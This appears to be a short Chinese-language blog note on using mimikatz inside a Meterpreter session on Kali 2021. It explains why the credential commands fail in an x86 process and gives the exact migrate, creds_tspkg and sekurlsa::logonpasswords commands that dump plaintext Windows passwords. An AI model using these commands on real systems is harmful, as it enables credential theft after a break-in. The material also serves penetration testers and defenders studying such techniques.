首先我使用的kali是2021的
当我们用meterpreter提权成功得到system权限之后
meterpreter > getuid
加载mimikatz
load mimikatz
不论运行什么命令都报错Retrieving wdigest credentials
看了别人的方法说用以下命令可以实现
mimikatz_command -f samdump::hashes
其实这是老版本的用法,运行还是会报错
当我们加载mimikatz后可以用help来查看使用方法
meterpreter > help
然后又使用以下命令还是无法实现
meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
不过总算找到了原因,mimikatz的x86无法访问x64
getpid和ps查看一下进程
meterpreter > getpid
meterpreter > ps
2600果然在x86下,所以只需要迁移进程到x64下就可以了
meterpreter > migrate 1864
随便找了个迁移到了1864下
接下来就能运行mimikatz的所有命令了
meterpreter > creds_tspkg
meterpreter > kiwi_cmd -f sekurlsa::logonpasswords
就能获取到明文密码了